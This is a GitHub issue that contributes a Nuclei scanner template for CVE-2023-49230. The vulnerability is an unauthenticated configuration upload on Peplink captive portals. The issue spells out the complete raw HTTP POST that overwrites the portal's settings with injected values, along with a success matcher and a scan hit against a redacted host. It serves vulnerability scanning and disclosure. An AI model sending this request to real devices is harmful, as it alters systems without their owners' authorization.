Skip to content

CVE-2023-49230 #12195

New issue
New issue
Open
Open
CVE-2023-49230#12195
Assignees
pussycat0x
Labels
Status: In ProgressThis issue is being worked on, and has someone assigned.template-contributionNuclei template contribution
@Evil-twinz

Description

@Evil-twinz
Evil-twinz
opened on May 29, 2025

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

id: cve-2023-49230

info:
  name: Peplink Captive Portal Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    Unauthenticated upload to /guest/portal_admin_upload.cgi with effect visible at /guest/preview.cgi?portal_id=1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
  tags: cve, peplink, upload, unauth

http:
  # Step 1: Upload configuration
  - raw:
      - |
        POST /guest/portal_admin_upload.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="option"

        edit_page
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="mode"

        submit
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="portal_id"

        1
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="data"

        {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"Injected","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo_action"

        x
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo"; filename=""
        Content-Type: application/octet-stream

        -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        words:
          - '"status": "save_success"'

Relevant dumped responses

[cve-2023-49230:word-1] [http] [high] https://redact.com/guest/portal_admin_upload.cgi

Anything else?

https://www.tenable.com/cve/CVE-2023-49230
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf

Metadata

Metadata

Assignees

Labels

Status: In ProgressThis issue is being worked on, and has someone assigned.template-contributionNuclei template contribution

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions